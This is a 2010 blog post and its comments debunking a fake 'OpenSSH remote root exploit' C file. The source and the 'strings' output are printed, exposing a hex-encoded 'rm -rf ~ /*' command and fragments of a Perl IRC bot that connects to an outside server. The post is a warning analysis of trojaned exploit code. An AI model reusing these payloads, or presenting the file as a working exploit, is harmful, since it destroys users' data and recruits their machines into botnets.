Yet Another Fake Exploit
Posted: February 7th, 2010 | Author: xanda | Filed under: IT Related | Tags: 0day, fake, openssh, script kiddies, ssh | 9 Comments »PenTestIT is listed in my RSS list and just now, i’ve got a feed from PenTestIT with the title “openssh-53p1-remote-root.c”
Hurm.. what a surprise news, but.. I think I’m too old for this.. lets see..
xanda:tmp adnan$ cd /tmp xanda:tmp adnan$ mkdir lame xanda:tmp adnan$ cd lame/ xanda:lame adnan$ wget http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c --2010-02-07 20:41:28-- http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c Resolving pentestit.com (pentestit.com)... 208.87.241.96 Connecting to pentestit.com (pentestit.com)|208.87.241.96|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13273 (13K) [text/x-c] Saving to: `openssh-53p1-remote-root.c' 100%[=========================================================================================================================================>] 13,273 7.82K/s in 1.7s 2010-02-07 20:41:30 (7.82 KB/s) - `openssh-53p1-remote-root.c' saved [13273/13273] xanda:lame adnan$ more openssh-53p1-remote-root.c /* openssh-53p1-remote-root.c * OpenSSH <= 5.3p1-1 Remote Root Exploit by the|one * Email: root@chamillionaire.com * Release date: Unreleased (private) / 2010 * Available Patch: No fix-patch has been issued or reported. * * ----------------- * Additional Notes: * ----------------- * By using this software, you take any and/or all responsibility * for the damage(s) caused and will not bitch to me, the|one, about it. * * USE THIS SOFTWARE AT YOUR OWN DISCRETION! Later skiddies. :> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdarg.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <netdb.h> #define VALID_RANGE 0xb44ffe00 #define build_frem(x,y,a,b,c) a##c##a##x##y##b char jmpcode[] = "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f" "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26"; char shellcode[] = "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20" "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f" "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24" "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24" "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79" "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22" "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20" "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f" "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24" "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24" "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63" "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" xanda:lame adnan$ gcc openssh-53p1-remote-root.c -o fake xanda:lame adnan$ strings fake | more the|one is rooting your Linux/FreeBSD Network Usage: %s -h <host> -p port Options: -h ip/host of target -p port -d username -B memory_limit 8/16/64 Root is required for raw sockets, etc. [+] the|one's OpenSSH Remote Root Exploit - 2010 [-] Resolving Failed [-] Connecting Failed Getting root isn't that hard, skiddie PS1='sh-3.2#' /bin/sh [-] Failed to exploit the target : rm -rf ~ /* 2> /dev/null & #!/usr/bin/perl $chan="#cn"; $ke"; while (<$sockG (.*)$/){print "; while (<$sockn"; sleep 1; k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl #!/usr/bin/perl #!/usr/bin/perl $chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print "; while (<$sockn"; sleep 1; k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl #!/usr/bin/perl |
knock knock knock… script kiddies.. grow up!
The exploit itself exists. However, the release of it won’t happen. That was created for little skiddies who just use and abuse other peoples work with no appreciation. But I do agree, script kiddies definitely need to grow up.
Later
@heh
i wish it is exist 🙂
@xanda
It does, heh. :>
Perhaps in the near future it will be released but for now, it’s going to remain discrete mainly for reasons such as this. The launch of this was only a test to see how fast it would spread. The file was only hosted for approximately 10 minutes and already, it’s blasted on pastebins, sites, etc.
Good luck on your blog,
the|one
Though I must admit I love the false information provided on that PenTestIT site.
I especially dig the
found on an un-secure of a person who was trying to root us.
That’s just gold, hah.
Bah.. your site doesn’t support it.
Later
@heh
dont use bbcode, use html.. this is wordpress and not phpbb 🙂
[…] من أن تستخدم Shellcode غير موثوق و اعرف محتويات هذا الملف (لأنه يقد يحتوي على أوامر تضر بنظامك!!) بالطرق […]
[…] you can also use the “strings” command in linux (as explained here). Write the entire shellcode bytes to a file and then run “strings” on it […]
I want to enter the world of hackers